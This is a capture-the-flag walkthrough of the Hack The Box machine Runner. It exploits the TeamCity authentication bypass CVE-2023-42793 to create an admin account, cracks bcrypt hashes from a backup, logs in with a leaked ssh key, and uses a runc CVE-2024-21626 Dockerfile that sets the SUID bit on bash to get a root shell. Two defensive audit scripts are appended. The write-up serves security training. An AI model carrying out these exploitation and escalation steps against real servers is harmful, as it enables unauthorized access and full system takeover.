HTB-Runner target machine notes
Summary
Runner is a medium-difficulty Linux machine on HTB. It involves the TeamCity authentication bypass CVE-2023-42793, which lets an unauthenticated user extract an API token and create an administrator account, and the runc container escape CVE-2024-21626, which is used for privilege escalation.
Runner target machine address:/machines/Runner
I. nmap scanning
1) Port scanning
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.13
Warning: 10.10.11.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.13
Host is up (0.26s latency).
Not shown: 63375 closed tcp ports (conn-refused), 2157 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
# Nmap done at Fri Aug 30 22:29:18 2024 -- 1 IP address (1 host up) scanned in 47.39 seconds
2) Detailed information scanning
nmap -sT -sV -sC -O -p22,80,8000 -o detail 10.10.11.13
Starting Nmap 7.93 ( ) at 2024-09-01 20:51 EDT
Nmap scan report for 10.10.11.13
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to /
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds
The http-title line reads "Did not follow redirect to", so port 80 redirects to a hostname. Bind that domain name in the /etc/hosts file:
sudo vi /etc/hosts
Add a line with 10.10.11.13 and the domain name, then save.
3) Vuln script scan
sudo nmap --script=vuln -p22,80,8000 10.10.11.13 -o vuln
II. Web penetration
Opened the homepage and poked around to collect information, but there is nothing useful; the names shown on the homepage might be usable later, and the links on the page all lead to 404 pages.
Try both directory brute-forcing and subdomain brute-forcing.
1) Directory brute-force
sudo gobuster dir -u -w /usr/share/wordlists/dirb/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 178] [--> /assets/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
2) Subdomain brute-force
ffuf -u -H "HOST:" -w /usr/share/SecLists/Discovery/DNS/ -fs 154
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/DNS/
:: Header : Host:
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________
[Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 121ms]
* FUZZ: teamcity
(Screenshot: directory results on the left, subdomain results on the right.)
3) Information analysis
Clicking through the directory results gave nothing useful, but the subdomain scan turned up teamcity. Write it to /etc/hosts:
echo "10.10.11.13 " | tee -a /etc/hosts
Then visit it.
Tested SQL injection, password reset and so on; none of them work. A Google search for public vulnerabilities gives:
CVE-2023-42793 :/exploits/51884
It allows us to create an administrator user without authorization. Reading the exploit, the mechanism is easy to understand: an authentication bypass leaks the administrator's token, and that token is then used to create a new administrator account.
Paste the exploit code into Kali and run it with no arguments to see the help:
python
=====================================================
* CVE-2023-42793 *
* TeamCity Admin Account Creation *
* *
* Author: ByteHunter *
=====================================================
usage: [-h] -u URL [-v]
: error: the following arguments are required: -u/--url
python -u
=====================================================
* CVE-2023-42793 *
* TeamCity Admin Account Creation *
* *
* Author: ByteHunter *
=====================================================
Token: eyJ0eXAiOiAiVENWMiJ9.Z2Q5NHVFQjFpdnJqLVpvRjVueVNkWTF4WkN3.YTM5MjkwZTktNTU1MS00MzA5LThkYTUtODc2MTQ5M2MwODUx
Successfully exploited!
URL:
Username: city_adminbsnn
Password: Main_password!!**
It created an administrator user for us: city_adminbsnn:Main_password!!**
Log in with it.
Go to the admin backend and download the backup file.
Download it locally and unzip it.
Go through the directory tree; the configuration files and database files usually hold useful information. First relax the permissions:
sudo chmod -R 777 *
Searching through the files, I found the users' password hashes. Pull the credential fields out with awk, sed, tee and similar tools, or simply copy them into a new file, creds:
John:$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/
nspjipzg:$2a$07$NhQTyKKikNjDy4HgKBjiiuc2ftK1XelfKkNiHy.4/HjDG1qmr9w36
city_adminbwgn:$2a$07$lQsvDl0GcSMeUl95ZZWBReYJYqymfIhZf20W3gQpoRw0TFtBy875u
Identify the hash type with hashid:
cat creds | awk -F: '{print $2}'|head -n 1 | hashid
Analyzing '$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board
[+] bcrypt
It is bcrypt.
Find the corresponding hash-mode number in hashcat:
hashcat --help| grep bcrypt
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
Crack the hashes with a wordlist:
hashcat creds /usr/share/wordlists/ --username -m 3200
When it finishes, view the results:
hashcat creds /usr/share/wordlists/ --username -m 3200 --show
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/:piper123
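An added audit helper, written for these notes rather than taken from the write-up or from any tool above. It reads a creds file in the user:hash layout shown earlier, reports each bcrypt hash's variant and cost factor, and flags low cost factors (cost 7 means only 2^7 rounds, which is why the wordlist run finished so quickly) as well as entries that are not well-formed bcrypt strings (the Matthew hash as reproduced above is shorter than the 60 characters bcrypt produces). The MIN_COST threshold of 10 is my own assumption, not a value from the page.

```python
import re

# bcrypt modular-crypt format: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Assumed policy threshold: a work factor below 2^10 is cheap for an
# attacker holding an offline copy of the hashes. Adjust to your own policy.
MIN_COST = 10

# Constructed sample in the user:hash layout of the creds file above.
SAMPLE_CREDS = """\
John:$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/
nspjipzg:$2a$07$NhQTyKKikNjDy4HgKBjiiuc2ftK1XelfKkNiHy.4/HjDG1qmr9w36
city_adminbwgn:$2a$07$lQsvDl0GcSMeUl95ZZWBReYJYqymfIhZf20W3gQpoRw0TFtBy875u
"""


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields, or return None if malformed."""
    m = BCRYPT_RE.match(hash_str)
    if m is None:
        return None
    variant, cost, salt, digest = m.groups()
    return {"variant": variant, "cost": int(cost), "salt": salt, "digest": digest}


def audit_creds(text):
    """Return (user, status, cost) per line; status is ok, weak-cost or malformed."""
    results = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, _, hash_str = line.partition(":")
        info = parse_bcrypt(hash_str.strip())
        if info is None:
            results.append((user, "malformed", None))
        elif info["cost"] < MIN_COST:
            results.append((user, "weak-cost", info["cost"]))
        else:
            results.append((user, "ok", info["cost"]))
    return results


if __name__ == "__main__":
    for user, status, cost in audit_creds(SAMPLE_CREDS):
        print(f"{user:16} {status:10} cost={cost}")
```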
a) Account information
Credentials: Matthew:piper123
Tried them over ssh; they do not work there, so set that aside and go back through the backup file for anything else.
b) ssh key
Finally found an ssh key:
./config/projects/AllProjects/pluginData/ssh_keys/id_rsa
Copy it out and rename it john.id_rsa (the name used below):
cp ./config/projects/AllProjects/pluginData/ssh_keys/id_rsa ../../id_rsa
Check who it belongs to by decoding the key body and looking for the comment field:
cat john.id_rsa | grep -v '\-' | base64 -d | strings
The decoded output contains the comment john@runner, so the key belongs to john.
III. Gaining a foothold
chmod 600 john.id_rsa
ssh john@10.10.11.13 -i john.id_rsa -o EnableEscapeCommandline=yes
The option -o EnableEscapeCommandline=yes re-enables the ~C escape command line (recent OpenSSH clients disable it by default), so port forwards and SOCKS tunnels can be added from inside the session without reconnecting.
IV. Privilege escalation
ss -lant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5005 0.0.0.0:* LISTEN -
tcp 0 248 10.10.11.13:22 10.10.14.11:33776 ESTABLISHED -
tcp 0 0 127.0.0.1:59056 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:41720 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 10.10.11.13:80 10.10.14.11:33912 ESTABLISHED -
tcp 0 0 172.17.0.1:54814 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:59430 TIME_WAIT -
tcp 0 0 127.0.0.1:59216 127.0.0.1:8111 TIME_WAIT -
tcp 0 1 10.10.11.13:38340 8.8.8.8:53 SYN_SENT -
tcp 0 0 172.17.0.1:34338 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 172.17.0.1:40448 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:58786 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:33934 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:55392 TIME_WAIT -
tcp 0 0 172.17.0.1:54802 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:41716 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 10.10.11.13:80 10.10.16.3:34523 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:55406 TIME_WAIT -
tcp 0 0 172.17.0.1:54982 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:59044 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:59436 TIME_WAIT -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8000 :::* LISTEN -
A number of ports are bound to localhost only, so build a SOCKS tunnel over ssh to reach them.
In the ssh session, press ~C to open the ssh command line, then enter -D 1080 to open a SOCKS proxy on local port 1080.
Press Enter to return to the shell; leaving the command line does not close the SOCKS proxy.
Configure the SOCKS proxy in Kali's browser as 127.0.0.1:1080.
Then you can access the target's local services. I am using FoxyProxy here; use whatever you prefer. Once it is set up, you are good to go.
Port 9000 turns out to be a Docker management page (Portainer).
It requires a login.
We have the credentials Matthew:piper123 from part II.
Since they were not ssh credentials, try them here.
Login succeeds.
Now that we have Docker access, check the runc version:
runc --version
runc version 1.1.7-0ubuntu1~22.04.1
spec: 1.0.2-dev
go: go1.18.1
libseccomp: 2.5.3
This version has a container escape vulnerability:
CVE-2024-21626:/blog/leaky-vessels-container-escape-vulnerabilities#cve-2024-21626-5
/files/176993/runc-1.1.
Put simply: runc mishandled file descriptors, and a leaked descriptor let a newly created container process inherit a working directory in the host filesystem namespace. Through that directory the container process can reach the host filesystem, which is the container escape.
With this understood, and given our position on the target, we cannot build or run Docker images from john's shell, but we can create containers and images from the Portainer panel.
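An added triage helper, written for these notes and not part of the write-up or of runc, that parses the `runc --version` output shown above and compares the upstream version against 1.1.12, the release that fixed CVE-2024-21626. Distribution packages may carry the fix as a backport without changing the upstream version number, so treat a positive result as a prompt to check the distro advisory rather than as proof of exposure.

```python
import re

# CVE-2024-21626 was fixed upstream in runc 1.1.12.
FIXED_VERSION = (1, 1, 12)

# Constructed sample in the layout of the `runc --version` output above.
SAMPLE_OUTPUT = """\
runc version 1.1.7-0ubuntu1~22.04.1
spec: 1.0.2-dev
go: go1.18.1
libseccomp: 2.5.3
"""

VERSION_RE = re.compile(r"^runc version (\d+)\.(\d+)\.(\d+)")


def parse_runc_version(output):
    """Return the upstream (major, minor, patch) tuple, ignoring distro
    suffixes such as -0ubuntu1~22.04.1, or None if no version line is found."""
    for line in output.splitlines():
        m = VERSION_RE.match(line.strip())
        if m:
            return tuple(int(x) for x in m.groups())
    return None


def needs_cve_2024_21626_review(output):
    """True if the upstream version predates the fix, False if it is at or
    past 1.1.12, None if the version could not be parsed."""
    version = parse_runc_version(output)
    if version is None:
        return None
    return version < FIXED_VERSION


if __name__ == "__main__":
    v = parse_runc_version(SAMPLE_OUTPUT)
    print("runc", ".".join(map(str, v)),
          "needs review:", needs_cve_2024_21626_review(SAMPLE_OUTPUT))
```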
First create a folder on the target as john:
mkdir -p /tmp/lingx5
cp /bin/bash /tmp/lingx5/bash
Then fill in the following Dockerfile in the Portainer image build page:
FROM ubuntu:latest
WORKDIR /proc/self/fd/8
RUN cd ../../../../../../../../ && \
chmod -R 777 /tmp/lingx5 && \
chown -R root:root /tmp/lingx5 && \
chmod u+s /tmp/lingx5/bash
Click Build the image below.
The Dockerfile gives /tmp/lingx5/bash the SUID bit.
Once the build reports success, /tmp/lingx5/bash should have SUID set.
Run:
/tmp/lingx5/bash -p
That gives a root shell.
cat /root/
Summary
- Port discovery on the host with nmap found ports 22, 80 and 8000 open.
- Directory brute-forcing on port 80 gave very little, so we tried subdomain brute-forcing and found teamcity. A Google search for public vulnerabilities turned up CVE-2023-42793, which we used to create an admin user. After logging in we found a backup function, downloaded the backup locally, and while rummaging through it found the credentials matthew:piper123 and an ssh key for john.
- After using the key to gain a foothold as john, we looked at the services running locally; most are bound to localhost only, so we built a SOCKS tunnel over ssh and found the Docker management service on port 9000.
- Using the credentials matthew:piper123 we logged into the panel, identified the runc version as affected by the escape vulnerability CVE-2024-21626, and reproduced its key step to escalate to root.